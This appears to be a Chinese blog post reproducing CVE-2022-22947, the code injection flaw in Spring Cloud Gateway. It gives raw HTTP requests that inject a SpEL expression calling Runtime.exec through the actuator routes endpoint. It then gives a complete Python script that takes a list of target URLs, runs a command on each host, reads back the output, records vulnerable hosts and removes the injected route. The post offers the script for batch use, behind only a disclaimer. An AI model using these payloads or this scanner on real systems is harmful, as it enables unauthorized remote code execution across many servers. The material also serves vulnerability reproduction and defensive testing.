“ 本文简单复现Spring Cloud Gateway代码注入漏洞,简单写了一个批量检测POC,欢迎师傅们使用。”
01
—
漏洞复现
概述
使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
影响版本
Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 其他已不再更新的版本
安全版本
Spring Cloud Gateway >= 3.1.1 Spring Cloud Gateway >= 3.0.7
环境搭建
访问8080
漏洞复现
1.发送恶意的代码注入到路由的post请求
POST /actuator/gateway/routes/code HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 329{"id": "chaosec","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"}}],"uri": "http://ggg.cpdd:80"}
2.发送post包刷新路由
POST /actuator/gateway/refresh HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
我这里bp有点问题,我就直接在浏览器刷新了
3.查看注入的代码
GET /actuator/gateway/routes/code HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
4.删除注入的路由
DELETE /actuator/gateway/routes/code HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: close
5.再次刷新
POST /actuator/gateway/refresh HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
02
—
漏洞批量检测POC
用法
项目地址
https://github.com/chaosec2021/CVE-2022-22947-POC/代码
import requestsimport urllib3import jsonimport reurllib3.disable_warnings()cmd='whoami'a='''$$$ $$ $$ $$$$$ $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$ $$$$$$$ $ $$ $$ $$ $ $$ $$ $$ $ $$ $ $$ $ $$ $ $$ $$ $$ $$$ $$$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $ $$ $$$$ $$$$ $$$$$ $$$ $$ $$ $$ $$ $$ $$$ $$ $$ $$ $$ $ $$ $$$$ $$$$ $$ $$ $$ $$ $$ $$ $$ $$ $$$$ $$$$$$ $$$$ $ $$$$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$$$$ $$ $$$$$ $$$$$ $$$ $$$$$ $$$$$ $$$$$ $$$$$ $$$ $$ $$by 欢迎关注chaosec公众号 禁止一切违法!'''b ='python CVE-2022-22947_POC.py url.txt'uri_check='/actuator/gateway/routes/code'uri_refresh='/actuator/gateway/refresh'headers = {'Accept-Encoding': 'gzip, deflate','Accept': '*/*','Accept-Language': 'en','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36','Content-Type': 'application/json'}payload = {"id": "code","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec("" + cmd +"").getInputStream()))}"}}],"uri": "http://ggg.cpdd","order": 0}#刷新路由def refresh(url):try:rf=url+uri_refreshreq_refresh =requests.post(url=rf,verify=False,timeout=1)code_refresh=req_refresh.status_codeif code_refresh==200:print('[+]刷新路由成功')else:print('[-]刷新路由失败')# print(code_refresh)# print(code_refresh)except requests.exceptions.RequestException:print('[-]刷新路由超时')except:print('[-]刷新路由异常')def huixian(url):try:req_huixian=requests.get(url=url+uri_check,verify=False,timeout=1)req_huixian_text=req_huixian.textreq_huixian_code =req_huixian.status_codeif req_huixian_code==200:req_huixian_text = req_huixian_text.replace('{', '')req_huixian_text = req_huixian_text.replace('}', '')req_huixian_text = req_huixian_text.replace('[', '')req_huixian_text = req_huixian_text.replace(']', '')req_huixian_text = req_huixian_text.replace('"', '')req_huixian_text = req_huixian_text.replace("'", '')req_huixian_text = req_huixian_text.replace(" ", '')req_huixian_text = req_huixian_text.replace("\n", '')req_huixian_re = re.compile(r'AddResponseHeaderResult=(.*?),')req_huixian_re_1 = req_huixian_re.findall(req_huixian_text, re.S)huixian =req_huixian_re_1[0]print(f'[+]获取回显命令成功:{huixian}')# print(req_huixian_text)else:print(url+uri_check)# print(req_huixian_code)print('[-]获取回显失败,请手动测试')except requests.exceptions.RequestException:print('[-]获取回显超时')except:print('[-]获取回显异常,请手动测试')#删除命令注入def del_rce_in(url):all=url+uri_checktry:req =requests.delete(url=all,verify=False,timeout=2)code = req.status_codeif code ==200:print('[+]删除注入路由成功')else:print('[-]删除注入路由失败')except requests.exceptions.RequestException:print('[-]删除注入路由超时')except:print('[-]删除注入路由异常')#批量检测漏洞def poc(txt):f =open(txt)f=f.readlines()for url in f:url =url.strip('n')url =url.strip('/')try:all =url+uri_checkreq =requests.post(url=all,data = json.dumps(payload, ensure_ascii = False),headers=headers,json=json,verify=False,timeout=2)code =req.status_codeif code ==201:# print(code)print(f'[+]{url}疑似存在漏洞')poc_file=open('success.txt','a+')poc_file.write(url+'n')poc_file.close()refresh(url)huixian(url)del_rce_in(url)refresh(url)# refresh(url)else:print(f'[-]{url}不存在漏洞')# continueexcept requests.exceptions.RequestException:time_poc=f'[-]{url}漏洞检测超时'print(time_poc)passexcept:print(f'[-]{url}rce注入失败,请检查网站是否能访问')continueif __name__ == '__main__' :print(a)poc('url.txt')
今天的文章就介绍到这里,欢迎大家转发三连,如果poc有问题私信联系我,我再去修改bug
原文始发于微信公众号(chaosec):CVE-2022-22947-Spring Cloud Gateway代码注入漏洞复现-附批量POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论